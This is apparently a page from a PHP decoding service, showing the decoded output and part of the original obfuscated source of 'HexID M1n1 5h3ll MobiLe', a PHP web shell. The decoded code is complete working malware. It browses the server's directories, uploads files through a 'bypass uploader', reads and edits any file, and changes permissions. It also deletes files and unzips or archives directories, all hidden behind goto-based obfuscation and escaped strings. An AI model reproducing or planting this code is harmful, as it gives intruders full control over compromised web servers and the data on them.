Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W: ..

Decoded Output download

<?php 
goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W: goto BozPb; IR4it: e3g6Z: goto zuRmu; VUOHb: goto ZA20W; goto KyeiS; dd2X3: dMZLI: goto eDE58; pmRhb: $ip = getenv("REMOTE_ADDR"); goto QyLNF; wZ_nc: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto b7dfR; zuRmu: if (!(strtotime($awal) <= time() and time() >= strtotime($expired))) { function write($content, $dir) { $fh = fopen($dir, "w"); if (fwrite($fh, $content)) { return "1"; } else { return "0"; } fclose($fh); } function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } function alert($msg) { print "<script>alert('" . $msg . "');</script>"; } function kabur($dir) { print "<script>window.location='" . $dir . "';</script>"; } function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B><b>Not.Writable</b></font>"; } else { return "<font color=lime><b>Writable</b></font>"; } } function r($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } echo "
<!DOCTYPE HTML>\xa<html>

<head>
<link href="" rel="stylesheet" type="text/css">\xa<title>xXx</title>\xa\xa<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">\xa<link href="https://fonts.googleapis.com/css?family=Teko" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=New Rocker" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Iceberg|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda|Inconsolata" rel="stylesheet" /> \xa<link href="https://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">\xa
\xa<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">\xa\xa<audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>\xa
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript" src="https://raw.githubusercontent.com/chuckyglitch/novacancy.js/master/javascript/jquery.novacancy.min.js"></script>

\xa<style>\xahtml{
width:100%;
}\xabody{
width:96%;
font-family: Iceland;\xabackground-color: black;
color:white;
}
#content tr:hover{
background-color: green;
text-shadow: 10px 10px 10px lime;
}\xa#content .first{\xacolor: black;\xabackground-color: lime;
}
table{
border: 1px lime solid;\xa}\xa
img[alt*="www.000webhost.com"] {\xadisplay: none;\xa}play: none;
}

.kane{\xaborder: 1px #000000 solid;\xa-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
font-weight:bold;
}

.Filez{\xaborder: 1px #000000 solid;\xa-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}

.kan{
-moz-border-radius: 4px;
-webkit-border-radius:4px;
border-radius:4px;\xa}
\xa.colz{\xabackground: #011111;border:1px lime solid;color:white;border-radius: 5px;\xa}



a{\xacolor:white;\xatext-decoration: none;
}
a:hover{\xacolor:lime;\xatext-shadow:0px 0px 10px #ffffff;
}
.blink_text {\xa-webkit-animation-name: blinker;\xa-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;\xa-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;\xa-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;
\xa animation-name: blinker;
 animation-duration: 2s;\xa animation-timing-function: linear;\xa animation-iteration-count: infinite;\xa\xa color: red;\xa}\xa@-moz-keyframes blinker { \xa 0% { opacity: 5.0;\xa }
 50% { opacity: 0.0;
 }\xa 100% { opacity: 5.0;\xa }\xa }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;\xa }\xa 50% { opacity: 0.0;
 }\xa 100% { opacity: 5.0;\xa }\xa }\xa@keyframes blinker { \xa 0% { opacity: 5.0;
 }\xa 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;\xa }
 }\xa</style> 
</head>
\xa
\xa<body>
<center><!--<p class="blink_text" style="font-size:45px;
color:white;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Iceland;">-->\xa\xa
<a href="?home"><font face="New Rocker" size="5"  style="color:black;text-shadow: 0 0 3px lime, 0px 0px 5px lime,0 0 5px lime,0 0 5px lime;"><b>HexID M1n1 5h3ll MobiLe </a></font></br></b>"; if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($dir); } else { $dir = getcwd(); } echo "<table style="border: 1px solid lime;border-radius: 5px;background: #01111;" width="100%" border="0" cellpadding="3" cellspacing="1">"; echo "<tr><td><center><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&zip=menu'><font color=lime>Zip Archiver</font></a> ]</font>"; echo "<tr><td><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&upmod=upmenu'><font color=lime>Upmod</font></a> ]</font></center>"; if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { $message = "<font color="white">File Upload : </font><font color=lime><b>Done Successfully</b></font>"; } else { $message = "<font color="red"><b>Failed Dir Not Writeable :(</b></font></center>"; } } echo "<form enctype="multipart/form-data" method="POST">"; echo "<br><center><input class="kan" type="file" name="file" /><font color=black>llllll</font><input class="kan" type="submit" value="upload" />\xa</center>"; if ($message) { echo "{$message}"; } echo "</form></font></table>"; echo "

<pre  id="pre" style="text-align: left;overflow:auto;
page-break-inside:avoid;
display:block;
margin:0 auto;
margin-top:0;
margin-bottom:0;\xaword-break:break-all;
word-wrap:break-word;\xaborder: 1px solid lime;\xaborder-top: black;\xacolor:lime;
background-color: darkslategrey;\xadirection:ltr;">\xa
"; $path = str_replace("\", "/", $path); $paths = explode("/", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<font size="2" face="New Rocker"><a href="?path=/"><b>" . r($dir, Dir) . "</b>:/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } echo "<font color=#0111111>_</font><b><font color=white>[ </font></b>" . w($dir, $perms) . "<b><font color=white> ]</font></b>"; echo "</font></pre><!--<hr color="green" style="margin-top:0;">-->"; if (isset($_FILES["zip_file"]["name"])) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { alert("File type cant zip"); kabur("?option&path={$path}&hexid=ziper"); } $pathx = $path . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $pathx . $filenoext; $targetzip = $pathx . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($pathx); $zip->close(); unlink($targetzip); } $message = "<font color=lime><b>Unzip Succesfully</b></font>"; } else { $message = "<font color=red><b>Unzip Failed!!</b></font>"; } } if ($_GET["upmod"] == "upmenu") { echo "<br><font color="green"><b>Special Premium Bypass Uploader He&#9760;id</b></font><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" size="50"><font color="black">llll</font><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; $rootPath = $_SERVER["DOCUMENT_ROOT"]; $thisPath = dirname($_SERVER["PHP_SELF"]); $pathz = str_replace($rootPath, " ", $thisPath); $dir = dirname("mystring/and/path.txt") . DIRECTORY_SEPARATOR; $pathxz = dirname(__FILE__); if ($pathz == '' || $pathz == "/" || $pathz == "\") { } if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { $web = "http://" . $_SERVER["SERVER_NAME"] . $pathxz . "/" . basename($_FILES["file"]["name"]) . ''; echo "Go <font size='2px'>&#10153; <a href='{$web}' target='_blank'><b><u>{$web}</font></u></b></a>"; echo "<br>Author : Tex7ure || <font color="magenta">Hillusion Exploit ID &#9760;</b></font> </tr></td></table><br><br>"; } else { echo "<b><font color="red">Upload Failed !!!</font></b><br><br>"; } } } if ($_GET["zip"] == "menu") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>


<font face='New Rocker' size='5'> [<font color='lime'> Zip Archiver </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'>
<br>\xa<font face='New Rocker' size='2'>\xa[ <a href='?option&path={$path}&auto=unzip'><font color=lime>Auto Unzip File</font></a> ]\xa
[ <a href='?option&path={$path}&zip=backup'><font color=lime>Zip Backup</font></a> ]\xa
[ <a href='?option&path={$path}&unzip=manual'><font color=lime>UnZip Manual</font></a> ]
 </b>\xa\xa</font></td></center></table>"; } if ($_GET["auto"] == "unzip") { echo "<br><table style="border:1px solid lime;border-radius:2px;width:100%;"><td><center>\xa\xa
<font face="New Rocker" size="5"> [<font color="lime"> Auto Unzip File </font>]</font>
<hr color="green" style:"margin-top:0;padding:0;"></center><form enctype="multipart/form-data" method="post" action="">"; echo "Zip File : "; if ($message) { echo "{$message}"; } echo "<br><br><input class="kan" type="file" name="zip_file" /><font color=#0111111>llllllll</font>
<input class="kan" type="submit" name="submit" value="Unzip" />
</form></table><br>"; if ($message) { echo "
<br><br><center><a href='?path=" . $path . "'>[ <font color=lime>Back to home</font> ]</a></center></font>"; } } if ($_GET["zip"] == "backup") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>\xa
<font face='New Rocker' size='5'> [<font color='lime'> Zip Backup </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'></center>
"; echo "\xa<br><form action='' method='post'><center>
<font style='text-decoration: underline;'>Folder: </font>\xa<input type='text' name='dir' value='{$dir}' style='width: 300px;margin:5px auto;' height='10'>\xa\xa<br><font style='text-decoration: underline;'>Save To:</font> <input type='text' name='save' value='{$dir}/hexid_backup.zip' style='width: 300px;margin:5px auto;' height='10'>\xa
<br><input class='kan' type='submit' name='backup' value='BackUp!' style='width: 215px;'></center></form></center></td></table>"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "<pre style='text-align: left;overflow:auto;
page-break-inside:avoid;
display:block;
margin:5px auto;
margin-top:5px;
padding:3px;
margin-bottom:3px;
word-break:break-all;\xaword-wrap:break-word;\xaborder: 1px solid white;\xaborder-radius:6px;\xaborder-right:black;
border-left:black;
background-color:darkslategray;\xadirection:ltr;'><font color=lime>Done Succesfully</font>, Save To: <b> {$save} </b></pre><br>"; } } if ($_GET["unzip"] == "manual") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>
\xa<font face='New Rocker' size='5'> [<font color='lime'> UnZip Manual </font>]</font>
<hr color='green' style:'margin-top:0;padding:0;'>
"; echo "<form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dird' value='{$dir}/file.zip' style='width: 300px;margin:5px auto;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='{$dir}/hexid_unzip' style='width: 300px;margin:5px auto;' height='10'><br><input class='kan' type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form></center>"; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dird"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "</td></table><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;\xamargin-top:5px;
padding:3px;\xamargin-bottom:3px;\xaword-break:break-all;\xaword-wrap:break-word;
border: 1px solid white;\xaborder-radius:6px;
border-right:black;
border-left:black;
background-color:darkslategray;
direction:ltr;'><font color=lime>Done Succesfully</font>, Location: <b>{$save}</b></pre>"; } else { echo "<hr style='margin-bottom:0;'><font color=red><b><center>Unzip Failed</center></b></font><hr style='margin-top:0;'>"; } } } if (isset($_GET["exit"])) { session_destroy(); alert("Thanks to use my project HexID M1n1 5h3ll Copyright 2019 Tex7ure - Hillusion Exploit ID"); kabur("?home"); } if (isset($_GET["filesrc"])) { echo "<br><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;
margin-top:5px;
padding:3px;\xamargin-bottom:3px;\xaword-break:break-all;
word-wrap:break-word;
border: 1px solid white;
border-radius:6px;
border-right:black;
border-left:black;\xabackground-color:#011111;
direction:ltr;'><font size='2' color='lime'>File:"; echo $_GET["filesrc"]; echo "</pre></font>"; $html = htmlspecialchars(file_get_contents($_GET["filesrc"])); echo "<from><center><textarea cols=42 rows=20 style='onfocus();color:white;background: #011111;border-radius:6px;border: 1px lime solid;' readonly>" . $html . "</textarea></center></from>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { alert("Change Permission Success"); } else { alert("Change Permission Failed"); } } echo "<form method="POST">\xaPermission : <input class="kan" name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="opt" value="chmod">
<input class="kan" type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { alert("Rename Success"); kabur("?path={$path}"); } else { alert("Rename Failed"); } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">New Name : \xa<input class="kan" name="newname" type="text" size="20" value="" . $_POST["name"] . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">\xa<input class="kan" type="submit" value="Save" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<table style="background: #011111;border-radius:6px;border: 1px lime solid;" width="100%"  align="center"><td>"; echo "<font color="lime">Success Edit File</font><br/>"; } else { echo "<font color="red">Failed Edit File</font><br/></table>"; } fclose($fp); } echo "<form method="POST">
<textarea class="colz" cols=42 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />
\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input class="kan" style="width:99%" type="submit" value="Save" />
</form></table>"; } echo "</center>"; } else { echo "<br/><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { alert("The directory has been deleted :v"); } else { alert("Directory failed to delete :D"); } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { alert("The file has been deleted :v"); } else { alert("File failed to delete :D"); } } } echo "</center>"; $scandir = scandir($path); echo "<div id="content"><table style="direction:ltr;overflow:auto;page-break-inside:avoid;background: #011111;border-radius:6px;border: 1px lime solid;" width="100%" cellpadding="2"  align="center">\xa<tr class="first">
<td><center>Name</center></td>
<td><center>SiizeFile</center></td>
<td><center>Prmisn</center></td>\xa<td><center>Modify</center></td>\xa</tr>"; foreach ($scandir as $dir) { if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr><td><img src="https://cdn4.iconfinder.com/data/icons/simple-soft/512/folder-256.png" width="6%"> <a href="?path=" . $path . "/" . $dir . "">" . $dir . "</a></td>
<td><center>-</center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $dir)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="red">"; } echo perms($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font>"; } echo "</center></font></td><td>

\xa\xa<center><form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>\xa</select>
\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="" . $dir . "">\xa<input type="hidden" name="path" value="" . $path . "/" . $dir . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr><td>
<img src="https://cdn3.iconfinder.com/data/icons/databases/512/copy-256.png" width="6%">
<!--<font size="3">-->\xa <a href="?filesrc=" . $path . "/" . $file . "&path=" . $path . "">" . $file . "</a>

<!--</font>--></td><td><center>\xa
<font size="1">" . $size . "</font></center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $file)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="red">"; } echo perms($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>"; } echo "</center></font></td><td><center>
\xa\xa\xa<form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>\xa<option value="delete">Delete</option>\xa<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="" . $file . "">
<input type="hidden" name="path" value="" . $path . "/" . $file . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "</table></div>"; } echo "<br/><center><table bordercolor="lime" style="border-radius:4px;width:92%;" align="center"><td>\xa
<b><center><a href="?exit">Copyright</a> &copy; " . date("Y") . " - <a href="mailto:[email protected]"><font color="lime">Tex7ure</a></font> | <a href="https://www.google.com/search?q=intext:Hillusion Exploit ID" target="_blank"><font face="New Rocker" size="2">Hillusion Exploit ID</a></font>
</center></font></table</b></center>
\xa</body>\xa</html>"; } else { echo "<html><head>\xa<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no'></head>
<style>\xabody {\xa    background: black;
    font-family: iceland;
    color: white;
    }</style>
<center> <font color=lime><b>[!] Warning [!]</b><br>"; date_default_timezone_set("Asia/Jakarta"); $anj = date("Y-m-d"); echo "<table border="1" bordercolor="lime" align="center">\xa<tr><td>"; echo "\xa<font color=white>Your Access Expired<td><font color=white>Date. In : <font color=lime><b>{$anj} </b></td></tr><tr><td><font color=white>Regist : <font color=lime><b>{$awal}</b><td><font color=white>Expired : <font color=lime><b>{$expired} </b></td></table></center>"; } goto Uogfg; BozPb: $expired = date("2024-01-21"); goto QZTPI; eDE58: error_reporting(0); goto VUOHb; Qvgw3: ZeahE: goto cFKiU; og3XE: l20Ep: goto wZ_nc; KyeiS: MAZ_m: goto pmRhb; Uogfg: goto MAZ_m; goto dd2X3; b7dfR: goto ZeahE; goto IR4it; bq_a0: goto dMZLI; goto efDM6; QZTPI: goto e3g6Z; goto Qvgw3; Scy9A: $awal = date("2023-12-21"); goto maD4I; QyLNF: goto l20Ep; goto qKjNm; cFKiU:  ?>

Did this file decode correctly?

Original Code

<?php
goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W: goto BozPb; IR4it: e3g6Z: goto zuRmu; VUOHb: goto ZA20W; goto KyeiS; dd2X3: dMZLI: goto eDE58; pmRhb: $ip = getenv("\122\105\115\117\124\x45\x5f\101\x44\104\122"); goto QyLNF; wZ_nc: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\x73"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\165"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\167" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\170" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\162" : "\x2d"; $info .= $perms & 16 ? "\167" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\x78" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\170" : ($perms & 512 ? "\124" : "\55"); return $info; } goto b7dfR; zuRmu: if (!(strtotime($awal) <= time() and time() >= strtotime($expired))) { function write($content, $dir) { $fh = fopen($dir, "\167"); if (fwrite($fh, $content)) { return "\61"; } else { return "\60"; } fclose($fh); } function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("\56" === $file || "\x2e\56" === $file) { continue; } if (is_dir("{$dir}\57{$file}")) { rmdir_recursive("{$dir}\57{$file}"); } else { unlink("{$dir}\57{$file}"); } } rmdir($dir); } function alert($msg) { print "\x3c\163\x63\162\151\x70\164\x3e\x61\x6c\x65\x72\164\x28\x27" . $msg . "\x27\x29\73\74\x2f\163\x63\162\x69\160\x74\x3e"; } function kabur($dir) { print "\74\x73\x63\162\151\160\164\x3e\167\151\156\x64\157\167\56\x6c\x6f\143\x61\164\x69\x6f\156\75\47" . $dir . "\x27\x3b\74\57\x73\x63\x72\151\x70\x74\x3e"; } function w($dir, $perm) { if (!is_writable($dir)) { return "\x3c\146\157\156\x74\x20\x63\157\154\x6f\x72\x3d\43\106\x46\x37\60\66\x42\x3e\x3c\142\76\x4e\157\164\x2e\x57\x72\x69\164\141\x62\x6c\145\x3c\57\142\x3e\x3c\x2f\x66\157\x6e\164\76"; } else { return "\x3c\x66\157\x6e\164\x20\143\x6f\x6c\157\x72\x3d\x6c\x69\155\145\76\x3c\x62\76\127\162\151\x74\141\x62\x6c\145\74\57\x62\76\x3c\57\146\157\x6e\164\76"; } } function r($dir, $perm) { if (!is_writable($dir)) { return "\74\x66\157\156\164\40\x63\157\x6c\157\x72\x3d\43\106\x46\x37\x30\x36\x42\x3e" . $perm . "\x3c\x2f\x66\x6f\x6e\164\76"; } else { return "\74\146\x6f\x6e\x74\x20\x63\x6f\x6c\157\162\x3d\x6c\151\x6d\145\x3e" . $perm . "\x3c\57\146\x6f\x6e\x74\x3e"; } } echo "\12\x3c\41\x44\117\103\124\131\x50\105\40\x48\x54\x4d\114\76\xa\74\x68\x74\x6d\154\x3e\12\12\74\150\145\141\144\x3e\12\x3c\x6c\x69\156\x6b\40\150\x72\145\x66\x3d\42\42\x20\162\145\x6c\x3d\x22\x73\164\171\154\x65\163\150\145\145\x74\x22\x20\x74\171\x70\x65\75\x22\164\x65\170\x74\57\143\x73\163\42\76\xa\74\164\151\x74\154\x65\x3e\170\130\x78\x3c\57\164\x69\x74\154\145\x3e\xa\xa\74\x6c\151\x6e\153\x20\x68\x72\145\x66\x3d\42\150\x74\x74\x70\x73\x3a\x2f\x2f\x66\x6f\x6e\x74\x73\56\147\x6f\x6f\x67\x6c\x65\x61\160\x69\163\x2e\x63\x6f\x6d\x2f\143\163\163\x3f\146\x61\155\151\154\x79\x3d\111\143\x65\154\141\156\144\x22\x20\162\x65\x6c\75\42\x73\164\x79\154\145\x73\x68\x65\145\164\x22\76\xa\x3c\154\x69\x6e\153\x20\x68\162\145\146\75\x22\x68\x74\164\160\163\72\x2f\x2f\146\157\x6e\164\x73\x2e\x67\x6f\x6f\x67\x6c\x65\141\160\x69\163\x2e\x63\157\x6d\x2f\143\163\163\77\x66\x61\155\151\154\171\75\x54\x65\x6b\x6f\42\40\x72\145\154\75\x22\x73\x74\x79\154\x65\x73\150\x65\x65\x74\x22\76\12\74\x6c\151\x6e\x6b\x20\150\162\x65\x66\75\42\150\x74\164\x70\163\x3a\x2f\x2f\146\x6f\x6e\x74\163\56\147\157\x6f\x67\x6c\145\x61\160\x69\163\x2e\x63\x6f\155\57\x63\163\x73\77\146\x61\155\x69\154\171\75\116\x65\x77\x20\122\x6f\x63\153\x65\x72\42\x20\162\x65\x6c\75\42\163\164\171\x6c\x65\x73\150\x65\145\164\42\76\12\74\154\151\156\x6b\40\150\x72\x65\146\75\42\x68\x74\x74\x70\x3a\x2f\x2f\x66\157\156\164\x73\x2e\x67\x6f\x6f\147\154\x65\141\160\x69\x73\x2e\x63\x6f\155\x2f\x63\163\163\77\146\141\155\151\154\x79\x3d\x42\x6c\x61\x63\x6b\x2b\x4f\x70\163\x2b\117\x6e\x65\174\x4d\x6f\x6e\x74\x73\x65\162\162\141\x74\x7c\103\141\x62\x69\x6e\53\123\x6b\x65\x74\143\150\174\111\x63\x65\x62\x65\162\x67\174\101\162\x63\150\x69\x74\x65\143\164\x73\53\104\x61\x75\x67\x68\x74\145\162\174\120\145\x72\155\x61\x6e\145\x6e\x74\53\115\x61\x72\153\x65\162\174\114\165\x63\x6b\151\x65\x73\x74\53\x47\165\x79\x7c\x43\x68\145\x72\x72\171\x2b\x43\x72\x65\x61\x6d\x2b\x53\x6f\144\141\x7c\x49\156\x63\x6f\156\163\x6f\x6c\141\x74\x61\x22\x20\162\145\154\x3d\42\x73\x74\171\154\145\163\150\145\x65\x74\x22\x20\57\76\x20\xa\x3c\154\x69\156\153\40\x68\x72\145\146\x3d\x22\x68\x74\164\160\163\x3a\57\x2f\146\x6f\x6e\164\163\56\147\x6f\157\147\154\x65\x61\x70\x69\x73\56\x63\x6f\x6d\57\143\x73\163\x3f\146\141\x6d\x69\154\x79\75\112\x6f\154\154\171\x2b\x4c\157\x64\147\x65\162\x22\x20\x72\145\154\x3d\x22\x73\x74\171\x6c\x65\163\150\x65\x65\x74\x22\x20\164\171\160\145\x3d\x22\x74\145\170\x74\x2f\143\x73\x73\x22\76\xa\12\xa\74\x6d\x65\164\x61\x20\156\141\x6d\145\x3d\42\166\151\x65\x77\x70\x6f\x72\x74\42\40\x63\157\x6e\164\145\x6e\x74\x3d\42\x77\151\144\x74\x68\x3d\144\x65\x76\x69\143\x65\55\167\151\144\x74\x68\54\x20\151\156\151\x74\x69\141\154\x2d\x73\143\141\x6c\x65\75\61\x2e\x30\x2c\40\155\141\x78\151\155\165\155\x2d\163\x63\141\x6c\x65\75\61\x2e\60\54\40\165\163\x65\162\x2d\x73\x63\x61\154\x61\x62\x6c\145\x3d\x6e\x6f\42\76\xa\xa\74\x61\x75\144\x69\x6f\x20\x61\165\x74\x6f\160\x6c\141\171\76\x20\x3c\163\x6f\165\162\x63\x65\x20\x73\162\143\x3d\x22\x68\x74\164\160\72\57\x2f\x77\x77\167\56\x73\157\x75\x6e\x64\145\x73\x63\141\x70\x65\163\164\165\x64\x69\157\163\56\x63\x6f\x6d\x2f\x53\x45\123\101\165\144\151\x6f\x2f\x53\x45\x53\45\x32\60\123\151\164\145\x25\x32\x30\x53\157\165\156\x64\x73\x2f\x42\x65\145\x70\163\x2f\x42\x65\145\x70\163\55\x73\150\157\162\x74\55\60\x31\x2e\167\x61\166\x22\40\x74\x79\x70\x65\75\x22\x61\165\x64\151\x6f\57\155\x70